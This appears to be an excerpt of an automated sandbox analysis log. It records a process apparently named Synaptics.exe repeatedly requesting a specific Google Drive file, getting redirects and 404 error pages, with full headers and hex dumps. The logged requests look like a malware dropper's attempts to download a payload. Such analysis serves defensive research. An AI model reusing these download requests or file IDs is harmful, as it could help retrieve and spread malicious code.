                                                                                                                                                                            2024-12-30 10:49:43 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            114192.168.2.849885142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:43 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-DdnYAofk-IqbSZvVr38FzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            115192.168.2.849886142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:43 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            116192.168.2.849887142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:43 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6gfgsg9caI1RW8in2-UWqvpFgCANcOGvJ4BEF6CnaBOCT2Ek3FukjJcYqidXhAW_5I
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:43 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-SwJMLa3viKzdOXhX68BPBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 43 36 66 55 62 4e 4f 37 47 36 42 45 6e 38 55 38 6c 4f 71 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="IC6fUbNO7G6BEn8U8lOqCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            117192.168.2.849891142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:44 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Il1QkrL4TNjN-KZyLk68ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            118192.168.2.849892142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:44 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:44 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6ipvl2OuaXA-EONjzF8TjaTuY7bPFrzdpEMXAtoApcUjov7GHF53uavlxoAWHI-9Yf
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:44 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-BlXMELQcQaqmM58x89caGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:44 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:44 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 61 68 6b 75 68 34 6d 50 54 74 38 6e 52 78 2d 42 79 39 71 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="uahkuh4mPTt8nRx-By9qSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:44 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            119192.168.2.849893142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:44 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:44 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:44 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-cEtsc7iOi1m0XMyv_tJM1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            120192.168.2.849895142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-OWPAH6Zj6kTV9svfr5sbvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            121192.168.2.849897142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:45 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:45 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AuRW0NHu3nsXjc4IfV14vA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            122192.168.2.849894142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:45 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:45 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5EBG23dgdmR367lMpCot7qExIGoyc8cgx9D8ENHpF9dUmiTdf1cK7-XEuC7Nqpputp
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:45 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
